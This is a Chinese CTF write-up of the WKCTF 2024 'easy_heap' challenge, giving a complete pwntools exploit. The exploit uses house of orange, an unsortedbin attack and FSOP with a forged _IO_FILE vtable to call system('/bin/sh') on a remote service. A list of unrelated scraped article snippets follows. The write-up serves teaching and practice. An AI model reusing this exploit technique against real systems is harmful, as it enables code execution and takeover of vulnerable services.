WKCTF 2024 easy_heap
很经典的house of orange + unsortedbin attack +FSOP+ 变量覆盖
不能 free,那首先想到就是 house of orange泄露Libc基址,然后unsortedbin attack。
但是只能show(8),就不能用largebin的套路来泄露堆地址了,那怎么办呢?
我们注意到这是>,但下标一般是从0开始,所以可能会有变量覆盖,我们看看。
果然,第33个chunk的size会覆盖第0个chunk地址的最后一字节,所以我们只需要调试一下,就可以通过show(0)泄露堆地址,其他没什么难度,以下是wp:
from pwn import *
context.arch='amd64'
#io=process('./pwn')
elf=ELF('./pwn')
libc=ELF('./libc-2.23.so')
#libc=elf.libc
io=remote('110.40.35.73',33774)def debug():gdb.attach(io)pause()def inter():io.interactive()def add(size,content):io.recvuntil(b">\n")io.sendline(b'1')io.recvuntil(b"Size :\n")io.sendline(str(size).encode())io.recvuntil(b"Content :\n")io.send(content)def edit(idx,size,content):io.recvuntil(b">\n")io.sendline(b'2')io.recvuntil(b"Index :\n")io.sendline(str(idx).encode())io.recvuntil(b"Size :\n")io.sendline(str(size).encode())io.recvuntil(b"Content :\n")io.send(content)def show(idx):io.recvuntil(b">\n")io.sendline(b'3')io.recvuntil(b"Index :\n")io.sendline(str(idx).encode())def delete():io.recvuntil(b"please input:\n")io.sendline(b'2')add(0x30,b'aa')#0
#debug()
edit(0,0x40,b'a'*0x38+p64(0xfc1))
add(0x1000,b'aa')#1
#debug()
add(0x10,b'\x78')#2
show(2)
libc_base=u64(io.recv(8))-0x3c4178
print('libc_base:',hex(libc_base))
#debug()
for i in range(29):add(0x1000,b'aa')
add(0x80,b'\x60')#32
#debug()
show(0)
heap=u64(io.recv(8))-0x60
chunk=heap+0xf0
print('heap:',hex(heap))
system=libc_base+libc.sym['system']
pl=b'a'*(0x10+0x90)
#debug()
vtable=chunk+0xe0
print('vtable:',hex(vtable))
iolist=libc_base+libc.sym['_IO_list_all']
payload=b'/bin/sh\x00'+p64(0x61)+p64(0)+p64(iolist-0x10)
payload+=p64(0)+p64(1)
payload=payload.ljust(0xd8,b'\x00')
payload+=p64(vtable)
payload+=p64(0)*3+p64(system)
print(len(payload))
edit(2,0x300,pl+payload)
#debug()
io.recvuntil(b">\n")
io.sendline(b'0'*0x400+b'1')
io.interactive()
相关文章:
WKCTF 2024 easy_heap
很经典的house of orange unsortedbin attack FSOP 变量覆盖 不能 free,那首先想到就是 house of orange泄露Libc基址,然后unsortedbin attack。 但是只能show(8),就不能用largebin的套路来泄露堆地址了,那怎么办呢? …...
SQL 多变关联使用子查询去重
不去重状态 select a.*,b.recon_amt from free_settlement_first aleft join free_settlement_second b on a.settlement_first_id b.settlement_first_id 有2条数据出现了重复 使用子查询去重 select a.*,b.recon_amt from free_settlement_first aleft join free_settlem…...
)
php表单提交并自动发送邮件给某个邮箱(示例源码下载)
只需要将以下代码内容进行复制即可用到自己的程序/API接口中: <?php if(!empty($_POST[is_post]) && $_POST[is_post]1){$url "https://www.aoksend.com/index/api/send_email";$name $_POST[name];$email $_POST[email];$subject $_POS…...
论文翻译:Large Language Models for Education: A Survey
目录 大型语言模型在教育领域的应用:一项综述摘要1 引言2. 教育中的LLM特征2.1. LLMs的特征2.2 教育的特征2.2.1 教育发展过程 低进入门槛。2.2.2. 对教师的影响2.2.3 教育挑战 2.3 LLMEdu的特征2.3.1 "LLMs 教育"的具体体现2.3.2 "LLMs 教育"…...
7.13实训日志
上午 学习网络安全的过程中,我们深入了解了网络的不同层面和技术,从表层网络到深网再到暗网,以及涉及的产业分类和技术工具。这些知识不仅帮助我们理解网络的复杂性,还揭示了如何应对和防范各种网络威胁。 首先,我们…...
【力扣】每日一题—第70题,爬楼梯
题目: 假设你正在爬楼梯。需要n阶你才能到达楼顶。 每次你可以爬1或 2 个台阶。你有多少种不同的方法可以爬到楼顶呢? 思路: 我开始是写了一个函数计算爬一层和爬二层的个数,之后排列求和,但是超范围了,…...
Docker修改国内镜像源
如果docker已将安装好 参考:https://github.com/cmliu/CF-Workers-docker.io sudo mkdir -p /etc/dockercd /etc/dockersudo vim daemon.json #输入以下内容 { "registry-mirrors": ["https://docker.fxxk.dedyn.io"] } #重启docker服务 su…...
安防监控视频平台LntonCVS视频融合共享平台智慧消防实现远程集中视频监控方案
近年来,电力系统内变电站着火事件频发,这对消防安全管理提出了严峻挑战。我国消防安全基础设施不完善、管理机制不健全、应急处置能力不足及公众消防安全意识淡薄等问题,严重制约了消防安全的提升。因此,加强变电站的消防安全管理…...
【大模型LLM面试合集】大语言模型架构_layer_normalization
2.layer_normalization 1.Normalization 1.1 Batch Norm 为什么要进行BN呢? 在深度神经网络训练的过程中,通常以输入网络的每一个mini-batch进行训练,这样每个batch具有不同的分布,使模型训练起来特别困难。Internal Covariat…...
OpenGL笔记八之EBO和EBO绘制流程
OpenGL笔记八之EBO和EBO绘制流程 —— 2024-07-07 晚上 bilibili赵新政老师的教程看后笔记 code review! 文章目录 OpenGL笔记八之EBO和EBO绘制流程1.EBO2.glDrawElements:如果使用了ebo,最后一个参数可以写03.glDrawElements:如果使用了e…...
maven——(重要)手动创建,构建项目
创建项目 手动按照maven层级建好文件夹,并写上java,测试代码和pom文件 构建项目 在dos窗口中执行如下命令 compile编译 当前maven仓库中什么都没有。 在pom所在层级下,执行: mvn compile 就开始显示下面这些,…...
数学建模·非线性规划
整型规划 适用于一个变量或多个变量的值只能是整型的情况 整形规划的分类 0-1背包问题 对于一个物品来说,只有选和不选两种情况 表现为单下标,单变量问题 例:建设学校问题 对于每个学校来说只有选和不选两种情况,在数学上我们用…...
SpringCloud第三篇(服务中心与OpenFeign)
p 文章目录 一、服务中心二、Nacos注册中心 一、服务中心 在上一章我们实现了微服务拆分,并且通过Http请求实现了跨微服务的远程调用。不过这种手动发送Http请求的方式存在一些问题。 试想一下,假如商品微服务被调用较多,为了应对更高的并发…...
Linux重要知识点
1. 命令行操作 Linux大多数操作都是通过命令行进行的。熟悉常用命令和脚本是使用Linux的基础。 基本命令:如 ls, cd, cp, mv, rm,这些命令用于文件和目录的管理。文件权限和管理:了解如何使用 chmod, chown, chgrp 等命令来管理文件权限和所…...
Unity宏和编辑器
宏:UNITY_EDITOR 等等 编辑器:Unity未运行时的状态 如何使用:#if UNITY_EDITOR 代码 #endif 什么情况下使用:包裹那些想要在编辑器模式下使用的代码 而在Unity运行时不会去调用的代码 AssetDatabase.LoadAssetAtPath(路…...
计算机网络——网络层(概念及IP地址划分)
目录 网络层概念 网络层向上层提供的两种服务 虚电路 网络提供数据报服务 虚电路服务与数据报服务的对比 网络层的两个层面 分组传送到路由器的运作 对网络层进行分层 网际协议IP 虚拟互联网络 IP地址 IP地址及其表示方法 IP地址的计算方式 IP地址的结构 …...
【JVM实战篇】内存调优:内存泄露危害+内存监控工具介绍+内存泄露原因介绍
文章目录 内存调优内存溢出和内存泄漏内存泄露带来什么问题内存泄露案例演示内存泄漏的常见场景场景一场景二 解决内存溢出的方法常用内存监控工具Top命令优缺点 VisualVM软件、插件优缺点监控本地Java进程监控服务器的Java进程(生产环境不推荐使用) Art…...
CVE漏洞爬虫脚本
前言:前阵子公司非要把CVE漏洞信息拉倒本地,说方便安全员们查看,其实在莫慌看来,大可不必,90%的CVE漏洞其实不具备现实利用的可能性的(不代表不能被利用),但是你说它没有意义也是不对…...
如何搭建互联网医院系统源码?医疗陪诊APP开发实战详解
今天,小编将为大家讲解如何搭建一个完整的互联网医院系统源码,并介绍医疗陪诊APP的开发实战。 一、互联网医院系统的架构设计 搭建一个完整的互联网医院系统,需要从架构设计开始。一个典型的互联网医院系统通常包含以下几个核心模块…...
高通平台android的Framework开发遇到的一些问题总结
涉及到framwork的修改一般都在QSSI文件夹下。 1、Android设备,发现耳机插入了设备,但是设备statusbar并没有显示耳机插入的状态。 frameworks/base/packages/SystemUI/res/values/config.xml 下修改: <string-array name"config_s…...
【字节跳动】Robix系统的底层技术参数配置
Robix 绝密底层裸数据 无修饰纯技术续档一、地址总线时序剥离源码 void addr_bus_timing_restore(void) {setup_hold_time_clr();strobe_delay_cancel();bus_wait_state_disable();addr_valid_mask_null(); } 总线时序原生参数地址建立保持时间清零 读写选通脉冲延时全部取消 总…...
认知殖民与范式陷阱:当代人工智能发展路径的文明危机研究
认知殖民与范式陷阱:当代人工智能发展路径的文明危机研究摘要本文从文明安全与认知主权视角出发,系统批判了当前以Transformer架构、Scaling Law和大语言模型为核心的人工智能技术范式。研究指出,该范式不仅是技术路径的选择,更是…...
》第4.2条直指Agent记忆泄露风险:3类必查缓存节点+2分钟自检脚本)
紧急!财政部新发《AI增强型审计工作指引(试行)》第4.2条直指Agent记忆泄露风险:3类必查缓存节点+2分钟自检脚本
更多请点击: https://kaifayun.com 第一章:AI Agent审计行业应用 AI Agent在审计行业的深度渗透正重塑传统作业范式。不同于规则驱动的RPA工具,AI Agent具备目标分解、工具调用、多步推理与自主反馈能力,可动态适配审计场景中的非…...
)
别再让‘自己’说话了:用ZEGO SDK搞定RTC通话中的回声消除(附实战避坑清单)
从工单到解决方案:ZEGO SDK回声消除实战指南 1. 回声问题排查:从用户反馈到技术定位 "为什么每次通话对方都能听到自己的声音?"——这是开发者后台最常见的一类工单。不同于理论探讨,真实场景中的回声问题往往伴随着模糊…...
Locale Remulator终极指南:Windows系统区域和语言模拟解决方案
Locale Remulator终极指南:Windows系统区域和语言模拟解决方案 【免费下载链接】Locale_Remulator System Region and Language Simulator. 项目地址: https://gitcode.com/gh_mirrors/lo/Locale_Remulator Locale Remulator是一款强大的Windows系统区域和语…...
Linux内核安全模块深入剖析【2.6】
第 11 章 Yama11.1 简介Yama 是一个源自古印度语的英文单词,翻译成汉语就是“阎罗”,阎罗是印度神话中掌管地狱的神。Yama 可以称为半个安全模块,说它是“半个”,原因是:(1)它是目前(…...
工业视觉光源颜色选型全攻略|白/红/蓝/绿光适用场景、原理与避坑细则
摘要:在工业AI视觉缺陷检测项目落地中,绝大多数工程师过度聚焦相机参数、镜头焦距、模型调参优化,却忽略了光源颜色选型这一核心前置条件。工业检测有一条公认铁律:成像决定上限,模型只负责兜底。相同工件、相同光源结…...
使用OpenClaw连接Taotoken配置Agent工作流的具体步骤
🚀 告别海外账号与网络限制!稳定直连全球优质大模型,限时半价接入中。 👉 点击领取海量免费额度 使用OpenClaw连接Taotoken配置Agent工作流的具体步骤 OpenClaw是一款流行的AI Agent开发框架,它允许开发者构建和运行能…...
神眸低功耗芯片突破:让摄像头摆脱电线,2045年或迎1000亿只智能视觉终端!推理算力创业机会大
神眸低功耗芯片突破,开启智能视觉终端未来神眸致力于在算力浪潮下游,凭借极致低功耗芯片设计,使摄像头摆脱电线束缚,开启千亿只智能视觉终端的未来。杨作兴带领神眸实现了摄像头功耗降低一个数量级的突破。第一代芯片达到业界三分…...
FFXIV国际服汉化终极指南:三步实现中文界面完美体验
FFXIV国际服汉化终极指南:三步实现中文界面完美体验 【免费下载链接】FFXIVChnTextPatch 项目地址: https://gitcode.com/gh_mirrors/ff/FFXIVChnTextPatch 还在为《最终幻想XIV》国际服的英文界面而烦恼吗?想要享受国际服丰富内容却苦于语言障碍…...